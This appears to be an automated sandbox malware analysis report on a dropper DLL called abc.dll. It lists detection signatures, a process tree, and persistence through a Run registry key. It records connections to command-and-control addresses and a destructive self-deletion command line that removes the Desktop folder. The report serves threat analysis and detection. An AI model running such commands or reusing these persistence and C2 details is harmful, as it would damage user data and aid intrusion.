Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
abc.dll

Overview

General Information

Sample Name:abc.dll
Analysis ID:574344
MD5:4095efe5247d786f5c8f03ee2678fe0a
SHA1:8fabbc1778b684e161d312a28aa16f065c3bf330
SHA256:a5d3d3c385f1405b606bd2427f625f24c81266bca36d552f5eb61dc82f887276
Tags:dll
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: UNC2452 Process Creation Patterns
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Creates an autostart registry key pointing to binary in C:\Windows
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Contains functionality to infect the boot sector
PE file has a writeable .text section
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Sigma detected: Suspicious Call by Ordinal
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Sigma detected: CurrentVersion Autorun Keys Modification
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Entry point lies outside standard sections
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Sigma detected: Autorun Keys Modification
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 2436 cmdline: loaddll32.exe "C:\Users\user\Desktop\abc.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 468 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\abc.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5656 cmdline: rundll32.exe "C:\Users\user\Desktop\abc.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • cmd.exe (PID: 5028 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 2224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 160 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
    • rundll32.exe (PID: 5668 cmdline: rundll32.exe C:\Users\user\Desktop\abc.dll,Dispatch MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4396 cmdline: rundll32.exe C:\Users\user\Desktop\abc.dll,InputFile MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4620 cmdline: rundll32.exe C:\Users\user\Desktop\abc.dll,PrintFile MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 2616 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4620 -s 736 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 3556 cmdline: rundll32.exe "C:\Users\user\Desktop\abc.dll",Dispatch MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • cmd.exe (PID: 3352 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 3440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 4944 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
        • cmd.exe (PID: 5612 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 1844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 2604 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
      • rundll32.exe (PID: 3352 cmdline: "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\abc.dll",Dispatch MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 984 cmdline: rundll32.exe "C:\Users\user\Desktop\abc.dll",InputFile MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4912 cmdline: rundll32.exe "C:\Users\user\Desktop\abc.dll",PrintFile MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 1768 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 732 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • rundll32.exe (PID: 456 cmdline: "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\abc.dll",Dispatch MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • cmd.exe (PID: 3696 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 4684 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth: Data: Command: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop", CommandLine: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\abc.dll",Dispatch, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 456, ProcessCommandLine: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop", ProcessId: 3696
Source: Process startedAuthor: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\abc.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\abc.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\abc.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 468, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\abc.dll",#1, ProcessId: 5656
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\abc.dll",Dispatch, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 5668, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Disp
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton: Data: Details: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\abc.dll",Dispatch, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 5668, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Disp

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: abc.dllVirustotal: Detection: 78%Perma Link
Source: abc.dllReversingLabs: Detection: 93%
Source: abc.dllAvira: detected
Source: abc.dllJoe Sandbox ML: detected
Source: 18.0.rundll32.exe.10000000.0.unpackAvira: Label: TR/Dropper.Gen
Source: 12.0.rundll32.exe.10000000.1.unpackAvira: Label: TR/Dropper.Gen
Source: 4.2.rundll32.exe.10000000.0.unpackAvira: Label: TR/Dropper.Gen
Source: 18.0.rundll32.exe.10000000.1.unpackAvira: Label: TR/Dropper.Gen
Source: 12.2.rundll32.exe.10000000.0.unpackAvira: Label: TR/Dropper.Gen
Source: 12.0.rundll32.exe.10000000.0.unpackAvira: Label: TR/Dropper.Gen
Source: 18.2.rundll32.exe.10000000.0.unpackAvira: Label: TR/Dropper.Gen
Source: abc.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10007F89 FindFirstFileA,FindNextFileA,4_2_10007F89
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_4.22.3254.0_neutral_split.scale-150_8wekyb3d8bbwe\microsoft.system.package.metadata\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_4.22.3254.0_neutral_split.scale-150_8wekyb3d8bbwe\Assets\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\WindowsApps\Deleted\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_4.22.3254.0_neutral_split.scale-150_8wekyb3d8bbwe\Assets\AppTiles\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_4.22.3254.0_neutral_split.scale-150_8wekyb3d8bbwe\Jump to behavior

Networking

barindex
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.56.232 19Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.56.231 98Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.56.110 98Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.56.251 6658Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 123.126.45.92 80Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeDomain query: blog.sina.com.cn
Source: global trafficTCP traffic: 107.163.56.232 ports 18963,1,3,6,8,9
Source: global trafficTCP traffic: 107.163.56.231 ports 18530,0,1,3,5,8
Source: global trafficTCP traffic: 107.163.56.110 ports 18530,0,1,3,5,8
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: global trafficTCP traffic: 192.168.2.5:49765 -> 123.126.45.92:80
Source: Joe Sandbox ViewASN Name: CHINA169-BJChinaUnicomBeijingProvinceNetworkCN CHINA169-BJChinaUnicomBeijingProvinceNetworkCN
Source: Joe Sandbox ViewASN Name: TAKE2US TAKE2US
Source: global trafficTCP traffic: 192.168.2.5:49751 -> 107.163.56.231:18530
Source: global trafficTCP traffic: 192.168.2.5:49752 -> 107.163.56.110:18530
Source: global trafficTCP traffic: 192.168.2.5:49762 -> 107.163.56.251:6658
Source: global trafficTCP traffic: 192.168.2.5:49763 -> 107.163.56.232:18963
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.231
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.110
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.110
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.231
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.110
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.231
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.251
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.251
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.251
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.251
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.251
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.251
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.232
Source: rundll32.exe, 00000004.00000002.774825715.000000000531E000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.774894959.000000000539E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://107.16
Source: rundll32.exe, 00000004.00000002.773183243.00000000028CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.110:18530/u1129.html
Source: rundll32.exe, rundll32.exe, 00000012.00000000.274634042.0000000010012000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://107.163.56.231:18530/
Source: rundll32.exe, 00000004.00000002.773183243.00000000028CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.231:18530//joy.asp?sid=rungnejcntCWrem5Fe5vteX8v2LUicbtudb8mtiWnZeYmZK
Source: rundll32.exe, 00000004.00000002.772649123.00000000002DB000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.231:18530/joy.asp?sid=rungnejcntCWrem5Fevte
Source: rundll32.exe, 00000004.00000003.550575319.0000000002942000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:
Source: rundll32.exe, rundll32.exe, 00000012.00000000.274634042.0000000010012000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://107.163.56.232:18963/main.php
Source: rundll32.exe, 00000004.00000003.497981630.00000000028FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.463294098.00000000028FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.php-
Source: rundll32.exe, 00000004.00000003.621544263.000000000296B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.php.
Source: rundll32.exe, 00000004.00000003.573233556.0000000002937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.php.sina.com.cn
Source: rundll32.exe, 00000004.00000002.773183243.00000000028CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.php?
Source: rundll32.exe, 00000004.00000002.775076173.00000000055BA000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.774894959.000000000539E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phpC:
Source: rundll32.exe, 00000004.00000002.773183243.00000000028CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phpJ
Source: rundll32.exe, 00000004.00000003.523865021.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.515136005.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.523761741.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.621676038.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.621544263.000000000296B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phpP
Source: rundll32.exe, 00000004.00000003.700389541.00000000028FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phpata
Source: rundll32.exe, 00000004.00000002.773183243.00000000028CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phpf
Source: rundll32.exe, 00000004.00000003.401571882.00000000028FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.410069528.00000000028FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phph
Source: rundll32.exe, 00000004.00000003.463071693.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.463965680.000000000296B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phpiceActivation
Source: rundll32.exe, 00000004.00000003.506438395.0000000002933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phpileMaps
Source: rundll32.exe, 00000004.00000003.769259388.00000000028FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phplication
Source: rundll32.exe, 00000004.00000002.773183243.00000000028CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phpn
Source: rundll32.exe, 00000004.00000003.401571882.00000000028FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.410069528.00000000028FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phpp
Source: rundll32.exe, 00000004.00000003.401571882.00000000028FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phpr
Source: rundll32.exe, 00000004.00000003.700389541.00000000028FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phption
Source: rundll32.exe, 00000004.00000003.769259388.00000000028FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.497981630.00000000028FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phpz
Source: rundll32.exe, 00000004.00000003.463071693.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.463965680.000000000296B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.php~
Source: rundll32.exe, 00000004.00000003.700389541.00000000028FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.php~-
Source: rundll32.exe, 00000004.00000003.573233556.0000000002937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:n/u/5762479093
Source: rundll32.exe, 00000004.00000003.700288987.0000000002936000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.550621832.0000000002949000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.700120244.0000000002933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.c
Source: rundll32.exe, 00000004.00000003.621355433.0000000002933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.c-k
Source: rundll32.exe, 00000004.00000003.648250545.0000000002946000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.523736997.0000000002944000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.515119198.0000000002944000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.648222459.0000000002936000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.506457934.0000000002945000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.c18963/main.php
Source: rundll32.exe, 00000004.00000002.777086863.0000000006E7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/%s
Source: rundll32.exe, 00000004.00000003.551151432.000000000296B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093
Source: rundll32.exe, 00000004.00000003.321114729.0000000002932000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.321172786.0000000002938000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093$n
Source: rundll32.exe, 00000004.00000003.506492587.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.769142464.000000000296B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093.
Source: rundll32.exe, 00000004.00000002.773183243.00000000028CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/57624790932
Source: rundll32.exe, 00000004.00000002.773183243.00000000028CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093I
Source: rundll32.exe, 00000004.00000003.498090383.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.700183285.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.700339140.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.506492587.000000000296B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093P
Source: rundll32.exe, 00000004.00000003.401571882.00000000028FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093i
Source: rundll32.exe, 00000004.00000003.700389541.00000000028FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093lication
Source: Amcache.hve.15.drString found in binary or memory: http://upx.sf.net
Source: unknownDNS traffic detected: queries for: blog.sina.com.cn
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10003F41 InternetReadFile,4_2_10003F41

System Summary

barindex
Source: abc.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: abc.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4620 -s 736
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10003F63 ExitWindowsEx,4_2_10003F63
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10003F63 ExitWindowsEx,12_2_10003F63
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_10003F63 ExitWindowsEx,18_2_10003F63
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000B2354_2_1000B235
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000B71E4_2_1000B71E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100121ED4_2_100121ED
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000AED14_2_1000AED1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_026E00CD4_2_026E00CD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_030B00CD5_2_030B00CD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1000B23512_2_1000B235
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1000B71E12_2_1000B71E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_100121ED12_2_100121ED
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1000AED112_2_1000AED1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_048300CD12_2_048300CD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_041700CD16_2_041700CD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_1000B23518_2_1000B235
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_1000B71E18_2_1000B71E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_100121ED18_2_100121ED
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_1000AED118_2_1000AED1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_032B00CD18_2_032B00CD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10001000 appears 933 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10009136 appears 39 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1000CDA0 appears 46 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10008B8B: DeviceIoControl,4_2_10008B8B
Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
Source: abc.dllStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
Source: abc.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: abc.dllVirustotal: Detection: 78%
Source: abc.dllReversingLabs: Detection: 93%
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\abc.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\abc.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\abc.dll,Dispatch
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\abc.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\abc.dll,InputFile
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\abc.dll,PrintFile
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4620 -s 736
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\abc.dll",Dispatch
